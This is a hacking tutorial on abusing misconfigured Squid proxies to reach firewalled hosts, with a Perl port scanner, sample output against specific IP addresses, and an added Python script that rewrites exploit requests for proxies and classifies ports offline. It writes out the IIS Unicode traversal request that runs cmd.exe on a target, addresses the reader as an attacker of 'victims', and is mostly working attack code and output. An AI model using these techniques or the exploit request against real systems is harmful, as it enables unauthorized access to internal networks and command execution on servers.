A proxy is used to relay HTTP and HTTPS connections - if you don't know what
a proxy is you should not be reading any of this. If we find a proxy port
open on a host it excites us, because a badly configured proxy can be used
to reach web servers that sit behind a firewall. Just as your own proxy
server lets you connect to it and surf sites on the outside of your network,
a victim's proxy server can serve as a gateway to machines that are normally
not reachable. For example: a firewall protects the 196.xxx.201.0/24
network. The intranet server is 196.xxx.201.10, but the firewall blocks
traffic to its port 80 (or 443). Port 3128 on 196.xxx.201.5 is open, and the
Squid proxy on it is not set up correctly (it accepts connections from
anyone). Point the proxy settings of your local browser at
196.xxx.201.5:3128, request 196.xxx.201.10, and you are on the intranet
server. Note that the intranet server sees the connection coming from the
proxy's address rather than yours, and that the proxy's own access log
records the request.
You can even run an exploit over a proxy. The only difference between
reaching the machine directly and via a proxy is that the request line must
carry the full URL (scheme and host, not just the path), e.g.:
Without proxy (the IIS Unicode directory traversal, for example):
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
With proxy:
GET http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
You will need to make some changes to your exploit's code, but generally
this is not difficult. Remember to point your exploit at the proxy address
and port! HTTPS is different: the proxy never sees the request itself. The
client first sends CONNECT host:443 HTTP/1.0, and after the proxy's 200
reply it speaks TLS through the tunnel. Squid by default only allows CONNECT
to the ports in its SSL_ports ACL (443), so the tunnel trick does not give
you arbitrary ports.
You could even use a proxy as a very primitive port scanner. By requesting a
URL on a different port - say GET http://victim:port/ HTTP/1.0 - you get a
different response depending on what the proxy found there. Some proxies -
Squid among them - will not even try to pass traffic to a destination port
below 1024: Squid's default Safe_ports ACL only admits a short list of low
ports (80, 443, 70, 21 and a handful of others) plus everything from 1025
up, so a request for a blocked port comes back as an "Access Denied" error
page that says nothing about the target. For ports above 1024 the proxy does
connect, and by interpreting its reply we can tell whether the port is open
or closed: Squid answers a refused connection with a "Connection refused"
error page, and a port where something accepted the connection but sent
nothing back with a "Zero Sized Reply" error page. Here is a simple Perl
script that works OK with Squid:
---proxyscan.pl---
#!/usr/bin/perl
# proxyscan.pl - crude port scanner that bounces every probe off a proxy.
# It asks the proxy for http://scanIP:port/ and looks at the proxy's answer:
# Squid returns a "Connection refused" error page for a closed port and a
# "Zero Sized Reply" error page when something accepted the connection
# but sent no data back.
use Socket;
if ($#ARGV<0) {die "Usage: proxyscan.pl proxyIP:port:scanIP:beginrange:endrange\n";}
($host,$port,$scanIP,$br,$er)=split(/:/,$ARGV[0]);
print "Testing $scanIP via $host:$port:\n";
$target = inet_aton($host) || die("Cannot resolve proxy $host\n");
for ($mp=$br; $mp <= $er; $mp++) {
  # absolute URL in the request line, as every proxy request must have
  my @results=sendraw("GET http://$scanIP:$mp/ HTTP/1.0\r\n\r\n");
  #system "sleep 2";
  foreach $line (@results){
    if ($line =~ /refused/) {print "Port $mp on $scanIP is closed\n"}
    if ($line =~ /Zero/) {print "Port $mp on $scanIP is open\n"}
  }
}
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
# connect to the proxy, send one raw request, return every line of the reply
sub sendraw {
  my ($pstr)=@_;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
    die("Socket problems\n");
  if(connect(S,sockaddr_in($port,$target))){
    my @in;
    select(S); $|=1; print $pstr;
    while(<S>){ push @in, $_;}
    select(STDOUT); close(S); return @in;
  } else { die("Can't connect...\n"); }
}
> perl proxyscan.pl 160.124.19.103:3128:160.124.19.98:5999:6002
Testing 160.124.19.98 via 160.124.19.103:3128:
Port 5999 on 160.124.19.98 is closed
Port 6000 on 160.124.19.98 is open
Port 6001 on 160.124.19.98 is closed
Port 6002 on 160.124.19.98 is closed
It might be that you want to change some things in this code - I have seen
that when the server does not close the connection (the port is open and
there is something listening on the other side, but no data is sent) the
script hangs around for a really long time. This is due to Squid not closing
the connection after a while, and I don't see a quick workaround for it (and
I am way too lazy to investigate it). It does work fine...provided you have
some time to kill. See also the section on network level attacks for >1024
destination port tricks.
Apparently proxy servers can also be used to send email anonymously, but I
can't find any good examples of this.
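Added example, not part of the original text, covering both the exploit-over-proxy rewrite and the proxy port scan above in one Python script. proxify_request does the "full URL" change mechanically on any raw request (the Unicode request quoted above is used as input), send_via_proxy talks to the proxy with a client-side socket timeout so the silent-port case returns instead of hanging, and classify maps Squid's error pages onto port states. The proxy name "proxy", the target 10.0.0.98 and the Squid replies in FAKE_REPLIES are constructed for the offline run; the X-Squid-Error header and the error-page texts are those of current Squid releases and may differ on older ones.

```python
import socket
from typing import Callable, Dict, Iterable, Tuple

# The page's own IIS Unicode traversal request, in origin-form (path only).
UNICODE_REQ = b"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\r\n\r\n"


def proxify_request(raw_request: bytes, target_host: str, target_port: int = 80,
                    scheme: str = "http") -> bytes:
    """Rewrite an origin-form request line (GET /path HTTP/1.0) into the
    absolute-form a forward proxy expects (GET http://host/path HTTP/1.0).
    Only the request line changes, plus a Host header if none is present;
    an already absolute-form request is returned unchanged."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    lines = head.rstrip(b"\r\n").split(b"\r\n")
    method, target, version = lines[0].split(b" ", 2)
    if target.startswith((b"http://", b"https://")):
        return raw_request
    default_port = 443 if scheme == "https" else 80
    authority = target_host if target_port == default_port else f"{target_host}:{target_port}"
    lines[0] = b" ".join([method, f"{scheme}://{authority}".encode() + target, version])
    if not any(h.lower().startswith(b"host:") for h in lines[1:]):
        lines.insert(1, f"Host: {authority}".encode())
    return b"\r\n".join(lines) + b"\r\n\r\n" + body


def send_via_proxy(proxy: Tuple[str, int], request: bytes, timeout: float) -> bytes:
    """One TCP connection to the proxy: write the request, read until the proxy
    closes or our own timeout fires (Squid waits minutes on a silent target,
    which is the hang described in the text), return whatever arrived."""
    with socket.create_connection(proxy, timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        try:
            data = sock.recv(4096)
            while data:
                chunks.append(data)
                data = sock.recv(4096)
        except socket.timeout:
            pass
    return b"".join(chunks)


# Markers of Squid's error pages (header form and body text, since older
# Squids send only the body text).  Order matters: the ACL denial is a 403
# and must be recognised before the generic status-code check below.
_SQUID_ERRORS = (
    (b"ERR_ACCESS_DENIED", b"Access Denied", "denied-by-proxy"),   # Safe_ports ACL hit
    (b"ERR_CONNECT_FAIL", b"Connection refused", "closed"),
    (b"ERR_ZERO_SIZE_OBJECT", b"Zero Sized Reply", "open"),         # accepted, sent nothing
    (b"ERR_READ_TIMEOUT", b"Read Timeout", "open-silent"),          # accepted, never answered
)


def classify(reply: bytes) -> str:
    """Map the proxy's reply for http://target:port/ onto a port state."""
    if not reply:
        return "no-reply"            # our timeout expired before Squid gave up
    for header_marker, body_marker, state in _SQUID_ERRORS:
        if header_marker in reply or body_marker in reply:
            return state
    status = reply.split(b"\r\n", 1)[0].split(b" ")
    if len(status) > 1 and status[1].isdigit() and int(status[1]) < 500:
        return "open"                # a real HTTP answer relayed from the target
    return "unknown"


def scan_via_proxy(proxy: Tuple[str, int], target: str, ports: Iterable[int],
                   timeout: float = 5.0,
                   transport: Callable[[Tuple[str, int], bytes, float], bytes] = send_via_proxy,
                   ) -> Dict[int, str]:
    """Bounce one GET http://target:port/ off the proxy per port and classify the reply."""
    results = {}
    for port in ports:
        request = proxify_request(b"GET / HTTP/1.0\r\n\r\n", target, port)
        results[port] = classify(transport(proxy, request, timeout))
    return results


# Constructed replies standing in for a Squid proxy, so the scan runs offline.
FAKE_REPLIES = {
    5999: b"HTTP/1.0 503 Service Unavailable\r\nX-Squid-Error: ERR_CONNECT_FAIL 111\r\n\r\n"
          b"<p>Connection to 10.0.0.98 failed.</p><p>(111) Connection refused</p>",
    6000: b"HTTP/1.0 502 Bad Gateway\r\nX-Squid-Error: ERR_ZERO_SIZE_OBJECT 0\r\n\r\n"
          b"<p>Zero Sized Reply</p>",
    6001: b"",                       # listener that never answers: we time out
    22:   b"HTTP/1.0 403 Forbidden\r\nX-Squid-Error: ERR_ACCESS_DENIED 0\r\n\r\n<p>Access Denied.</p>",
    8080: b"HTTP/1.1 404 Not Found\r\nServer: Apache\r\n\r\n<p>not here</p>",
}


def fake_transport(proxy: Tuple[str, int], request: bytes, timeout: float) -> bytes:
    """Pull the port out of the absolute URL and return the constructed reply."""
    port = int(request.split(b" ", 2)[1].rsplit(b":", 1)[1].split(b"/", 1)[0])
    return FAKE_REPLIES[port]


if __name__ == "__main__":
    print(proxify_request(UNICODE_REQ, "target").decode())   # the "With proxy" line above
    states = scan_via_proxy(("proxy", 3128), "10.0.0.98", [5999, 6000, 6001, 22, 8080],
                            transport=fake_transport)
    for port, state in states.items():
        print(f"Port {port} on 10.0.0.98 is {state}")
    # Against a real proxy: drop transport=fake_transport and pass its real address.
```

The same open-proxy check from a shell is `curl -x http://proxyIP:3128 http://intranetIP/`; if the page comes back, the proxy relays for anyone. The "no-reply" state is the one the Perl script stalls on: the target accepted the connection and said nothing, and Squid keeps waiting, so the scanner has to give up on its own rather than wait for the proxy.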